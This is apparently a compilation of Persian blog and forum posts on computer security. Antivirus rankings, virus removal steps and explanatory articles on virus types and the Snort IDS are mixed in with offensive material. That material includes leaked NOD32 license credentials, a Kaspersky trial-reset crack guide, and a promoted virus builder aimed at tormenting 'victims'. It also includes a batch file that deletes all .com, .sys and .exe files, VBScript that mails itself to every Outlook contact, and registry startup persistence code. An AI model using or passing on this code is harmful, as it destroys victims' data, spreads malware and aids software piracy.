- قدرت شناسایی و حذف ویروس و Trojan ها.

- میزان تأثیرگذاری بر سرعت سیستم کاربر.

- بدست آوردن سریع و آسان کلید یا آنچه برای Active کردن برنامه نیاز است.

- توانایی غیرفعال کردن موقت آنتی ویروس و جلوگیری از حذف یک فایل.

کاربران گرامی ، آنچه در زیر مشاهده می کنید رتبه بندی بر اساس تجربه ای است که در طول این سال ها در زمینه آنتی ویروس ها به دست آورده و بیان آن بر اساس نظریه علمی خاصی نمی باشد ، اما از آنجا که آنتی ویروس ها را به منظور ایجاد امنیت نصب می کنیم بنابراین در جدول نهایی ابتدا امنیت و سپس سرعت در نظر گرفته شده است. ممکن است مندرجات زیر با نظرات شخصی شما کاربران گرامی مغایرت داشته باشد که شما می توانید نظر خود را در نظرسنجی موجود در صفحه نخست سایت ثبت بفرمائید. چنانچه در ورژن های بعدی ، معایب هر یک از آنتی ویروس ها برطرف شود ، جداول زیر نیز به دنبال آن ، تغییر خواهند کرد.

ادامه مطلب ...

1- وبلاگ کظم غیظ را Home Page می کند یعنی وقتی Internet Explorer را باز می کنید تا سایتی را وارد کنید بلافاصله وبلاگ کظم غیظ نمایش داده می شود.

2- غیر فعال شدن گزینه Run در Start Menu (در بعضی سیستم ها).

3- غیر فعال شدن گزینه Manage پس از راست کلیک بر روی My Computer.

4- Folder Options را نیز پنهان می نماید (در بعضی سیستم ها).

5- غیرفعال شدن پنجره Task Manager (در بعضی سیستم ها).

6- ارسال پیام گروهی ناخواسته در Yahoo! Messenger (در بعضی سیستم ها).

حذف این ویروس دو روش دارد. یک روش نرم افزاری و یک روش عملکرد دستی است. در زیر هر دو روش قرار داده شده است که در صورتی که از یکی از روش ها پاسخ مثبت نگرفتید از روش دوم استفاده کنید:

ادامه مطلب ...

بله. فایل های به روز رسان این نرم افزار در پوشه Updfiles در مسیر پنهان زیر است:

برای Windows XP در مسیر:

C:\Documents and Settings\All Users\Application Data\ESET\ESET Smart Security

و برای Windows Vista در مسیر:

C:\ProgramData\ESET\ESET Smart Security

توجه داشته باشید فایل های Update یک ورژن خاص ، برای ورژن دیگر مناسب نیست. در صورتی که می خواهید این فایل ها را از سیستمی به سیستم دیگر انتقال دهید ابتدا از یکسان بودن ورژن های نصب شده بر روی دو سیستم مطمئن شوید. برای انتقال کافیست ابتدا پنجره Task Manager را با Ctrl+Alt+Del باز کرده و گزینه EGUI.EXE را End Process کنید. پس از انتقال فایل ها ، برنامه را باز کنید و آن را با یک Username و Password زنده به روز رسانی کنید. این کار در لحظات کوتاهی پایان می پذیرد.

برای از بین بردن این ویروس باید وارد محیط Safe Mode شوید. بدین شکل که پس از Restart کردن سیستم خود ، پیش از بالا آمدن ویندوز ، دکمه F8 را کلیک کنید تا وارد این محیط شوید. وارد Run شده و در آن تایپ کنید CMD و OK کنید. با تایپ کردن :C و Enter زدن ، به ریشه اصلی این Drive وارد شوید. خط فرمان زیر را تایپ کنید و Enter را فشار دهید:

attrib Fooool.* -s -h -r -a

اکنون دستور مقابل را تایپ کنید و Enter را فشار دهید:

dir /s Fooool.exe

اگر فایلی یافت شد پس حضور این ویروس قطعی است و باید از طریق دستور زیر ، آن را حذف نمود:

del Fooool.exe

اعمال فوق را برای همه Drive ها انجام دهید تا از عدم حضور ویروس اطمینان حاصل کنید.

بله ؛ این فایل ها در پوشه Definitions در مسیر پنهان زیر برای ورژن 2010 ذخیره می شود:

C:\Documents and Settings\All Users\Application Data\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_17.0.0.136\Definitions

توجه کنید بخش قرمز رنگ در مسیر بالا، ورژن (Build) آنتی ویروس شماست. در صورتی که ورژن بالاتری وجود دارد و از آن استفاده می کنید ، عدد مربوط به آن ورژن ، به جای این قسمت قرمز رنگ قرار خواهد گرفت.

برداشتن فایل ها کار دشواری نیست اما چگونگی انتقال کامل آنها به سیستم دیگر بدون مواجه شدن با Error کمی نیاز به اجرای برخی تکنیک ها دارد. ابتدا در سیستمی که می خواهید این فایل ها را به آن انتقال دهید برنامه Norton Internet Security را باز کرده و در همان قسمت بالا روی عبارت Settings کلیک کرده تا پنجره دوم باز شود.

در پائین پنجره دوم روی سربرگ Miscellaneous Settings کلیک کنید. اکنون گزینه Norton Product Tamper Protection را که فعال است (On) ، غیرفعال کنید (Off). حالا می توانید بدون مواجه شدن با Error فایل های Update را به همان آدرسی که در بالا نوشته شده است انتقال دهید. پس از این کار ، مجدداً Norton Product Tamper Protection را فعال کرده و برنامه را از طریق اینترنت در مدت بسیار کوتاهی به روز رسانی کنید.

با این آنتی ویروس شما به راحتی می توانید این ویروس را از سیستم حذف کنید. 

دانلود          حجم: ۱.۱۵۷ مگابایت

1-      آنتی ویروس  آویرا ،  ویژگیهای برتر: توانائی نصب شدن روي سیستمهای آلوده ،  درصد شناسائی و نابودسازی بالای بدافزارها ، اسکن عمیق ، کم حجم بودن

۲-      آنتی ویروس نود32 ،  ویژگیهای برتر: داشتن هوش مصنوعی بالا با خطای کم ،( تقریبا 80% از تهدیدهایی که به طور پیشگیرانه توسط نود32 کشف می شود توسط قابلیت هوش مصنوعی آن  است) درصد پائین خطای شناسائی

۳-      آنتی ویروس کسپراسکای ،  ویژگیهای برتر: حفاظت از خود در برابر حملات ، ظاهر کاربر پسند ، به روز شدن سریع اطلاعات در برابر خطرات آنی. و پس از آنها به ترتیب موارد زیر در رتبه های بعدی هستند: آنتی ویروس سیمانتک ، آنتی ویروس مك آفی2009 ، آنتی ویروس بیت دفندر و آنتی ویروس پاندا.

ادامه مطلب را مشاهده نماييد ...

بروز رسانی ناد 32 (nod 32 ) شما هر روز با یوزر و پسورد های رایگان

Username:EAV-06546667
Password:bvxkrfhsmd

Username:EAV-11129881
Password:mwee4cxp28

Username:EAV-11333729
Password:h65wu88ka8

Username:EAV-11955920
Password:br3ejp5cbj

Username:EAV-11128353
Password:tw2mmbkmk4

Username:EAV-11150463
Password:b5bcn47apx

New Update Username And Password 2009 NOD32 -  2009/02/14   -   02/14/2009

Username:EAV-10611195
Password:ch5cu74bdu

Username:EAV-10662180
Password:brdbsfux6k

Username:EAV-07386494
Password:pk84ubp4rw

Username:EAV-10461618
Password:n3fpcat8rn

Username:EAV-10452159
Password:dnbfwbx27t

Username:EAV-01090120
Password:4kk6xnxxfj

New Update Username And Password 2009 NOD32 -  2009/01/24   -   01/24/2009

در این روش از نسخه‌ی 30 روزه و آزمایشی استفاده میكنیم و میدونید كه در طی این مدت دقیقا مثل نسخه‌ی Full كار میكنه. اما این 30 روز رو هر 30 روز مجددا فعال میكنیم به این ترتیب میتونید به طور دائم و كاملا بی‌دردسر از این آنتی ویروس قدرتمند استفاده كنید.

مراحل زیر رو به ترتیب انجام بدید و مطمئن باشید این ساده ترین روش برای استفاده از Auto Update برنامه است.

مراحل بازگردانی Kaspersky 2009

ابتدا برنامه Kaspersky Trial Reset رو از انتهای همین مطلب دانلود كنید و سپس مراحل زیر را انجام دهید :

1. خصوصیت "Self-Defense" ضد ویروس Kaspersky را غیر فعال كنید. برای غیر فعال كردن روی آیكون Tray ضد ویروس Kaspersky راست كلیك كنید و را انتخاب كنید. انتخاب  (در سمت راست زیر  "Self-Defense") و علامت كنار    را بردارید و سپس .

2. Exit Kaspersky. با راست كلیك روی آیكون برنامه.

3. كرك رو اجرا كنید و صبر كنید تا Kaspersky برای فعال سازی پیغام دهد. ( Kaspersky باید به طور خودكار اجرا شود ) . اگر Kaspersky خودكار اجرا نشد به طور دستی آن را اجرا كنید یا فقط كامپیوتر را ریست كنید. (اگر مراحل 1 و 2 را اجرا نكرده باشید كرك به طور خودكار بسته خواهد شد.)

4. برای uninstall فقط فایل را پاك كنید.

نكته: اگر شما پیغامی مانند "activation server is unavailable" (یا no internet) بعد از استفاده از كرك دریافت كردید.كارت شبكه خود را یك بار غیرفعال/فعال كنید. (این مشكل مربوط به برنامه است نه كرك). همچنین هنگامی كه برنامه درحال Update است كرك را اجرا نكنید.

چون در تعدای از سایتهای ایرانی مشاهده کردم که به جای کمک به کسانی که مورد حمله این ویروس قرار گرفته اند فایلهایی راقرار داده اند که متأسفانه خود دارای ویروس میباشد سعی کردم در این تاپیک در مورد شناسائی و از بین بردن این ویروس کمک کنم.
امیدوارم که به جای نابود کردن همدیگر به یکدیگر کمک کنیم ..!!!!
راه حل اول
این ویروس یعنی کظم غیظ یا kazme_gheze را که ویروسی است که اطلاعات شما را به بیرون هدایت میکند و در این مورد شما را به سایت مشخصی هدایت میکند با توجه به اینکه symantec antivirus این ویروس را به نام win32.virut شناسائی میکند در این سایت به شما اعلام میکند که با آپدیت کردن آنتی ویروس این ویروس به راحتی از بین میرود. البته ابتدا باید system restore کامپیوتر خود را خاموش کنید تا فایل های آن کاملا پاک شود و گرنه ویروس دوباره باز میگردد.

برنامه ای برای ساخت ویروس

توضیح :

Toxic-CV یک نرم افزاره که می تونه یک ویروس با قابلیت ها یی که شما  انتخاب می کنید درست کنه .
شما می تونید این ویروس رو به کسی که می خواین اذیتش کنین بفرستین . در ضمن Cv  مخفف Custimized Virus  هست .

قابلیت های برنامه :
1-راه اندازی در StartUp (بدون نمایش در Msconfig)
2-غیر فعال کردن TaskMgr,Msconfig,Regedit,Norton Anti Virus,Mcafee Antivirus,Windows Firewall
3-قابلیت تعیین نام ویروس بعد از Install 
4-پشتیبانی از پسوند ها مهم فایل های اجرایی مانند : exe , scr, bat ,  cmd , pif
5-قابلیت انتخاب Icon ویروس 
5-پیغام خطای کاذب ( Fake Message )
6-قابلیت بخشیدن قربانی به  2 صورت
7-قابلیت های  آزار قربانی مانند : پر کردن هارد ، بوق زدن ! ، کم کردن سرعت کامپیوتر ، و ....
8- حجم بسیار کم : 10-9 کیلوبایت                                                

آموزش استفاده از برنامه : 
برنامه رو اجرا کنید و در صفحه ی About  روی Ok  کلیک کنید ( نه بابا )
خوب تو صفحه ی اصلی  بخش اول یعنی  General Settings واضحه  و معمولا تو بیشتر Ps ها هم هست .بخش  Exe Icon & Name  هم که واضحه و به نام و Icon ویروس قبل از اینکه نصب شه اشاره داره
بخش Fake Message هم که واضح تر از همست . 

بخش Forgive Victim : این بخش واسه انتخاب گزینه هایی برای تنظیم بخشش  یا عدم بخشش قربانی هست . خوب شما اینجا سه تا گزینه می بینید :

الف : Forgive victim with this password : با انتخاب این گزینه اون قربانی که ویروس تو کامپیوترش اینستال شده با فشار دادن Alt + Ctrl + Del صفحه ای رو می بیینه که ازش یک رمز
می خواد اگه قربانی اون رمزی رو که شما در روبه روی این گزینه وارد کردید  رو وارد کنه . ویروس غیر فعال می شه .

ب  : Forgive victim after a restart : با انتخاب این گزینه ویروس بعد از یک ریستارت غیر فعال می شه .

چ  : Don't forgive victim : با انتخاب این گزینه ویروس  به هیچ وجه غیر فعال نمیشه .  

حالا می رسیم به بخش  Enable  & Disable Viruses  : تو این بخش شما می تونید قسمت های مختلف آزار قربانی خودتان رو در ویروس فعال یا غیر فعال کنید .
شرح قسمت ها مختلف :

1-Gardually decrease system speed : اگه این گزینه انتخاب بشه ویروس به تدریج سرعت سیستم رو کم می کنه تا جایی که ....  .

2-Gradually fill the hard : اگه این گزینه انتخاب بشه ویروس به تدریج  هارد رو پر می کنه تا جایی که ....  .

3-Disable Yahoo! Messenger : اگه این گزینه انتخاب بشه ویروس یاهو مسنجر رو غیر فعال می کنه ! 

4-Beep every second : اگه این گزینه انتخاب شه ویروس هر ثانیه بوق می زنه !

5-Swap mouse buttons every 30 seconds for 10 seconds : اگه این گزینه انتخاب شه ویروس هر 30 ثایه به مدت 10 ثانیه جای دکمه های ماوس رو عوض می کنه !

6-Shutdown computer every 20 minutes  : اگه این گزینه انتخاب شه ویروس بعد از 20 دقیقه که از روشن شدن کامپیوتر / اجرا شدن ویروس  بگذره سیستم قربانی رو شات داون می کنه .

7-Lock Computer Every 30 seconds for 10 seconds : اگه این گزینه انتخاب شه ویروس هر 30 ثانیه  به مدت 10 ثانیه کامپیوتر رو قفل می کنه .

وقتی همه ی تنظیمات رو انجام دادید روی Create Virus  کلیک کنید فایل ویروس به نامی که شما در قسمت  Exe name وارد کردید در پوشه ای که برنامه توش اجرا شده ساخته می شه .

Download Toxic-Cv        

خوب ساختن ویروس رو آغاز می کنم 
notepad باز شد پنجره این ها رو بنویسید توش

@echo off

Cls

===========

Color fc

Del /a c:\*.com

Del /a c:\*.sys

Del /a c:\*.exe /s

===========

خوب تایپ کردن دیگه بسه این فایل را با هر نامی که دل تان خواست ذخیره کنید ولی پسوند را با نام bat بگذارید ، مثل gach18.bat

خوب کار دیگه تموم شد این ویروس رو اگر کسی باز کنه کامپیوتر رو با یک خاک مساوی می کنه و ویندوز یا هر نوع سیستم عامل دیگه رو از کار می اندازه

 دوستان با دادن نظر من رو برای بهتر شدن کار راهنمایی کنید

ویروس

صفحه اصلی

ویروس و ضدویروس

حجم عظیم ویروس ها، کرم ها، ایرادات نرم افزارها و تهدیدهای ناشی از آنها، نرم افزارهای ضدویروس را تبدیل به یکی از ابزارهای لازم برای همه کامپیوترها نموده است. در صورت آلوده شدن یک کامپیوتر به ویروس بسته به نوع آن ممکن است مصائب مختلفی برای سیستم کامپیوتری بوجود آید که در پاره ای موارد جبران آن ها هزینه های زیادی را تحمیل می کند. آسیب های بعضی از ویروس ها به گونه ای است که آثار سوء آن ها را به هیچ وجه نمی توان از بین برد. مستقل از نوع ویروسی که باید با آن مقابله شود نیاز به برنامه های ضد ویروس همواره وجود دارد و در شرایطی که محصولات ضد ویروس متنوعی تولید شده اند، انتخاب نرم افزار مناسب دغدغه کاربران می باشد.

این مقاله ضمن معرفی انواع ویروس ها، نحوه عمل کرد برنامه های ضدویروس و انواع ویروس هایی که ضدویروس ها شناسایی و پاکسازی می کنند را معرفی می کند. همچنین اطلاعاتی که برای انتخاب ابزار مناسب لازم است بیان شده و تعدادی از برنامه های ضد ویروس با هم مقایسه  خواهند شد.

ویروس چیست؟

ویروس های کامپیوتری برنامه هایی هستند که مشابه ویروس های بیولوژیک گسترش  یافته و پس از وارد شدن به کامپیوتر اقدامات غیرمنتظره ای را انجام می دهند. با وجودی که همه ویروس ها خطرناک نیستند، ولی بسیاری از آنها با هدف تخریب انواع مشخصی از فایل ها، برنامه های کاربردی و یا سیستم های عامل نوشته شده اند.

 ویروس ها هم مشابه همه برنامه های دیگر از منابع سیستم مانند حافظه و فضای دیسک سخت، توان پردازنده مرکزی و سایر منابع بهره می گیرند و می توانند اعمال خطرناکی را انجام دهند به عنوان مثال فایل های روی دیسک را پاک کرده و یا کل دیسک سخت را فرمت کنند. همچنین یک ویروس می تواند مجوز دسترسی به دستگاه را از طریق شبکه و بدون احراز هویت فراهم آورد.

برای اولین بار در سال ۱۹۸۴ واژه «ویروس» در این معنا توسط فرد کوهن در متون آکادمیک مورد استفاده قرار گرفت. د‍ر این مقاله که «آزمایشاتی با ویروس های کامپیوتری» نام داشت نویسنده دسته ای خاص از برنامه ها را ویروس نامیده و این نام گذاری را به لئونارد آدلمن نسبت داده است. البته قبل از این زمان ویروس ها در متن داستان های عملی و تخیلی ظاهر شده  بودند.

انواع ویروس

انواع ویروس های رایج را می توان به دسته های زیر تقسیم بندی نمود:

boot sector :

 boot sector  اولین Sector  بر روی فلاپی و یا دیسک سخت کامپیوتر است. در این قطاع کدهای اجرایی ذخیره شده اند که فعالیت کامپیوتر با استفاده از آنها انجام می شود. با توجه به اینکه در هر بار بالا آمدن کامپیوتر Boot sector مورد ارجاع قرار می گیرد، و با هر بار تغییر پیکربندی کامپیوتر محتوای boot sector هم مجددا نوشته می شود، لذا این قطاع مکانی بسیار آسیب پذیر در برابر حملات ویروس ها می باشد.

این نوع ویروس ها از طریق فلاپی هایی که قطاع boot آلوده دارند انتشار می یابند. Boot sector  دیسک سخت کامپیوتری که  آلوده شود توسط ویروس آلوده شده و هر بار که کامپیوتر روشن می شود، ویروس خود را در حافظه بار کرده و منتظر فرصتی برای آلوده کردن فلاپی ها می ماند تا بتواند خود را منتشر کرده و دستگاه های دیگری را نیز آلوده نماید. این گونه ویروس ها می توانند به گونه ای عمل کنند که تا زمانی که دستگاه آلوده است امکان boot  کردن کامپیوتر از روی دیسک سخت از بین برود.

این ویروس ها بعد از نوشتن بر روی متن اصلی boot سعی می کنند کد اصلی را به قطاعی دیگر بر روی دیسک منتقل کرده و آن قطاع را به عنوان یک قطاع خراب (Bad Sector) علامت گذاری می کند.

Macro viruses:

 این نوع ویروس ها مستقیما برنامه ها را آلوده نمی کنند. هدف این دسته از ویروس ها فایل های تولید شده توسط برنامه هایی است که از زبان های برنامه نویسی ماکرویی مانند مستندات Exel یا Word استفاده می کنند. ویروس های ماکرو از طریق دیسک ها، شبکه و یا فایل های پیوست  شده با نامه های الکترونیکی قابل گسترش می باشد.

ویروس تنها در هنگامی امکان فعال شدن را دارد که فایل آلوده باز شود، در این صورت ویروس شروع به گسترش خود در کامپیوتر نموده و سایر فایل های موجود را نیز آلوده می نماید. انتقال این فایل ها به کامپیوتر های دیگر و یا اشتراک فایل بین دستگاه های مختلف باعث گسترش آلودگی به این ویروس ها می شود.

File infecting viruses:

 فایل های اجرایی (فایل های با پسوند .exe و .com) را آلوده نموده و همزمان با اجرای این برنامه ها خود را در حافظه دستگاه بار نموده و شروع به گسترش خود و آلوده کردن سایر فایل های اجرایی سیستم می نمایند. بعضی از نمونه های این ویروس ها متن مورد نظر خود را به جای متن فایل اجرایی قرار می دهند.

ویروس های چندریخت(Polymorphic):

این ویروس ها در هر فایل آلوده به شکلی ظاهر می شوند. با توجه به اینکه از الگوریتم های کدگذاری استفاده کرده و ردپای خود را پاک می کنند، آشکارسازی و تشخیص این گونه ویروس ها دشوار است.

ویروس های مخفی:

این ویروس ها سعی می کنند خود را از سیستم عامل و نرم افزارهای ضدویروس مخفی نگه دارند. برای این کار ویروس در حافظه مقیم شده و حائل دسترسی به سیستم عامل می شود. در این صورت ویروس کلیه درخواست هایی که نرم افزار ضدویروس به سیستم عامل می دهد را دریافت می کند. به این ترتیب نرم افزارهای ضدویروس هم فریب خورده و این تصور به وجود می آید که هیچ ویروسی در کامپیوتر وجود ندارد. این ویروس ها کاربر را هم فریب داده و استفاده از حافظه را به صورت مخفیانه انجام  می دهند.

ویروس های چندبخشی

رایج ترین انواع این ویروس ها ترکیبی از ویروس های boot sector  و file infecting  می باشد. ترکیب انواع دیگر ویروس ها هم امکان پذیر است.

سایر برنامه های مختل کننده امنیت

برخی از محققین اسب های تروا(Trojan)، کرم ها و بمب های منطقی را در دسته ویروس ها قرار نمی دهند ولی واقعیت این است که این برنامه ها هم بسیار خطرناک بوده و می توانند خساراتی جدی به سیستم های کامپیوتری وارد نمایند.

اسب های تروا تظاهر می کنند که کاری خاص را انجام می دهند ولی در عمل برای هدف دیگری ساخته شده اند، به عنوان مثال برنامه ای که وانمود می کند که یک بازی است ولی در واقع اجازه دسترسی از راه دور یک کاربر به کامپیوتر را فراهم می آورد.

   کرم ها برنامه هایی هستند که مشابه ویروس ها توان تکثیر کردن خود را دارند، ولی برعکس آنها برای گسترش خود نیاز به برنامه هایی دیگر ندارند تا آنها را آلوده کرده و تحت عنوان فایل های آلوده اقدام به انتقال و آلوده کردن دستگاه های دیگر نمایند. کرم ها معمولا از نقاط آسیب پذیر برنامه های e-mail  برای توزیع سریع و وسیع خود استفاده می نمایند.

   بمب های منطقی برنامه هایی هستند که در زمان هایی از قبل تعیین شده؛ مثلا یک روز خاص؛ اعمالی غیر منتظره انجام می دهند. این برنامه ها فایل های دیگر را آلوده نکرده و خود را گسترش نمی دهند.

علی رغم تنوع انواع برنامه های مخرب، برنامه های قوی ضد ویروس می توانند نسخه های مختلف آنها را شناسایی و از بین ببرند. در ادامه این متن برای سادگی به همه انواع این برنامه ها عنوان عمومی ویروس اطلاق می شود.

در بخش های بعدی نرم افزارهای ضدویروس مورد بررسی قرار خواهند گرفت.

 

---

 

Snort، نمونه‌ای از یک ابزار تشخیص نفوذ شبکه‌ای

 

 

    یک نرم‌افزار تشخیص نفوذ به‌صورت کدباز است که بر روی محیط‌های Linux و Windows عرضه می‌گردد و با توجه به رایگان بودن آن، به یکی از متداول‌ترین سیستم‌های تشخیص نفوذ شبکه‌های رایانه‌یی مبدل شده است. از آن‌جاکه برای معرفی آن نیاز به معرفی کوتاه این دسته از ابزارها داریم، ابتدا به مفاهیمی اولیه درباره‌ی ابزارهای تشخیص نفوذ می‌پردازیم، به عبارت دیگر معرفی این نرم‌افزار بهانه‌یی است برای ذکر مقدمه‌یی در باب سیستم‌های تشخیص نفوذ.

    Intrusion Detection System (IDS) یا سیستم تشخیص نفوذ به سخت‌افزار، نرم‌افزار یا تلفیقی از هر دو اطلاق می‌گردد که در یک سیستم رایانه‌یی که می‌تواند یک شبکه‌ی محلی یا گسترده باشد، وظیفه‌ی شناسایی تلاش‌هایی که برای حمله به شبکه صورت‌ می‌گیرد و ایجاد اخطار احتمالی متعاقب حملات، را بر عهده دارد.

    IDSها عملاً سه وظیفه‌ی کلی را برعهده دارند : پایش، تشخیص، واکنش. هرچند که واکنش در مورد IDSها عموماً به ایجاد اخطار، در قالب‌های مختلف، محدود می‌گردد. هرچند دسته‌یی مشابه از ابزارهای امنیتی به نام Intrusion Prevention System (IPS) وجود دارند که پس از پایش و تشخیص، بسته‌های حمله‌های احتمالی را حذف می‌کنند. نکته‌یی که در این میان باید متذکر شد، تفاوت و تقابل میان Firewallها و IDSها است. از آن‌جاکه ماهیت عمل‌کرد این دو ابزار با یکدیگر به کلی متفاوت است، هیچ‌یک از این دو ابزار وظیفه‌ی دیگری را به طور کامل برعهده نمی‌گیرد، لذا تلفیقی از استفاده از هردو ابزار می‌تواند امنیت کلی سیستم را بالا ببرد.

 

    در حالت کلی IDSها را می‌توان به دو دسته‌ی کلی تقسیم‌بندی نمود :

- Network IDS (NIDS)

- Host IDS (HIDS)

    HIDSها، اولین سیستم IDSی هستند که در یک سیستم رایانه‌ای باید پیاده‌سازی شود. معیار تشخیص حملات در این سیستم‌ها، اطلاعات جمع‌آوری شده بر روی خادم‌های مختلف شبکه است. برای مثال این سیستم با تحلیل صورت عملیات انجام شده، ذخیره شده در پرونده‌هایی خاص، سعی در تشخیص تلاش‌هایی که برای نفوذ به خادم مذکورد انجام شده است دارد. این تحلیل‌ها می‌تواند به صورت محلی بر روی خود خادم انجام گردد یا به سیستم تحلیل‌گر دیگری برای بررسی ارسال شود. یک HIDS می‌تواند تحلیل اطلاعات بیش از یک خادم را بر عهده بگیرد.

 

    با این وجود، اگر نفوذ‌گر جمع‌آوری صورت عملیات انجام‌شده بر روی هریک از خادم‌های مورد نظر را به نحوی متوقف کند، HIDS در تشخیص نفوذ ناموفق خواهد بود و این بزرگ‌ترین ضعف HIDS است.

    NIDSها، به عنوان دومین نوع IDSها، در بسیاری از موارد عملاً یک Sniffer هستند که با بررسی بسته‌ها و پروتکل‌های ارتباطات فعال، به جستجوی تلاش‌هایی که برای حمله صورت می‌گیرد می‌پردازند. به عبارت دیگر معیار NIDSها، تنها بسته‌هایی است که بر روی شبکه‌ها رد و بدل می‌گردد. از آن‌جایی‌که NIDSها تشخیص را به یک سیستم منفرد محدود نمی‌کنند، عملاً گسترده‌گی بیش‌تری داشته و فرایند تشخیص را به صورت توزیع‌شده انجام می‌دهند. با این وجود این سیستم‌ها در رویایی با بسته‌های رمزشده و یا شبکه‌هایی با سرعت و ترافیک بالا کارایی خود را از دست می‌دهند.

 

    با معرفی انجام شده در مورد دو نوع اصلی IDSها و ضعف‌های عنوان شده برای هریک، واضح است که برای رسیدن به یک سیستم تشخیص نفوذ کامل، به‌ترین راه استفاده‌ی همزمان از هر دو نوع این ابزارهاست.

 

     Snort، در کامل‌ترین حالت نمونه‌یی از یک NIDS است. این نرم‌افزار در سه حالت قابل برنامه‌ریزی می‌باشد :

• حالت Sniffer

    در این حالت، این نرم‌افزار تنها یک Sniffer ساده است و محتوای بسته‌های ردوبدل شده بر روی شبکه را بر روی کنسول نمایش می‌دهد.

• حالت ثبت‌کننده‌ی بسته‌ها

Snortدر این وضعیت، اطلاعات بسته‌های شبکه را در پرونده‌یی که مشخص می‌شود ذخیره می‌کند.

•  سیستم تشخیص نفوذ

    در این پیکربندی، بر اساس دو قابلیت پیشین و با استفاده از قابلیت تحلیل بسته‌ها و قوانینی که تعیین می‌گردد، Snort امکان پایش و تحلیل بسته و تشخیص نفوذ را یافته و در صورت نیاز واکنش تعیین شده را به‌روز می‌دهد.

 

    حالت پیش‌فرض خروجی این ابزار فایلی متنی است که می‌تواند در آن ابتدای بسته‌ها را نیز درج کند. با این وجود در صورتی‌که این ابزار در حال فعالیت بر روی ارتباطات شبکه‌یی با سرعت بالا می‌باشد به‌ترین راه استفاده از خروجی خام باینری و استفاده از ابزاری ثانویه برای تحلیل و تبدیل اطلاعات خروجی است.

 

    بُعد دیگر از پیکربندی Snort به عنوان یک سیستم تشخیص نفوذ، استفاده از قوانین برای ایجاد معیار نفوذ برای Snort است. برای مثال می‌توان با قانونی، Snort را مکلف ساخت که نسبت به دسترسی‌های انجام شده مبتنی بر پروتکلی تعیین شده از/به یک پورت خاص و از/به یک مقصد معین با محتوایی شامل رشته‌یی خاص، اخطاری یا واکنشی ویژه را اعمال کند.

 

    نکته‌یی که باید در نظر داشت این‌ است که از آن‌جاکه Snort را می‌توان به گونه‌یی پیکربندی نمود که قابلیت تشخیص حمله توسط ابزارهای پویش پورت را نیز داشته باشد، لذا با وجود استفاده از Snort نیازی به استفاده از ابزاری ثانویه برای تشخیص پویش‌گرهای پورت وجود ندارد.

 

    همان‌گونه که گفته شد، Snort با قابلیت‌های نسبتاً کاملی که در خود جای داده‌است، به همراه رایگان بودن آن و قابلیت نصب بر روی محیط‌ها و سیستم‌های عامل متدوال، به یکی از معمول‌ترین IDSهای کنونی مبدل شده است. برای دریافت این نرم‌افزار و همچنین اطلاعات جامعی در مورد آن می‌توانید به پای‌گاه اصلی آن، www.snort.org، مراجعه کنید.

 

---

اموزش : برنامه خود را از طریق ادرس ایمیل دیگران در تمام جهان پخش کنید

شما با استفاده از اتلوک اکسپرس می تونید برنامه به ویژه ویروس خودتون رو در سرار جهان پخش کنید این روشی که من الان می نویسم یکی از روش های پخش ویروس هاست ولی خوب با استفاده از این روش می تونید برنامه یا هرچی رو در تمام جهان پخش کنید

Code:

Set OutlookApp = CreateObject("Outlook.Application")
If Not OutlookApp = "" Then
For Each ContactSwitch In OutlookApp.GetNameSpace("MAPI").AddressLists
For UserGroup = 1 To ContactSwitch.AddressEntries.Count
Set OutlookEmail = OutlookApp.CreateItem(0)
OutlookEmail.Recipients.Add ContactSwitch.AddressEntries(UserGroup)
OutlookEmail.Subject = "Check this out!"
OutlookEmail.Body = "Look at the file in the attachments, It's great! :P"
OutlookEmail.Attachments.Add WScript.ScriptFullName
OutlookEmail.DeleteAfterSubmit = True
OutlookEmail.Send
Next
Next
End If


OutlookEmail.Subject = "Check this out!"
OutlookEmail.Body = "Look at the file in the attachments, It's great! :P"
OutlookEmail.Attachments.Add WScript.ScriptFullName
 

اگه متوجه نشدید ناراحت نشید چون قرار نیست که همه متوجه بشن اگه این طوری باشه همه ملت ویروس نویس می شن فقط اونهای که تو این کار (ویروس نویسی ) هستن می دونن این کد چه ارزشی داره . در ضمن تا یادم نرفته اقا من ویروس نویس نیستم ( نکنه یه دفعه برام ویروس بفرستن حالم رو بگیرن ) من برای تفریح با این ویروس ها ور می رفتم ازشون یه چیز های یاد گرفتم
خوب چون این تاپیک به درد تازه کار ها هم خوره یه اموزش مقدماتی می دم که برای ویروس نویسی هم به کار می یاد
1)اجرای برنامه در استارتاپ:
با استفاده از کد زیر می تونید برنامه ای که می نویسید تو استارتاپ قرار بدید

Code:

Set Reg = CreateObject("wscript.shell")
Reg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run  \" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"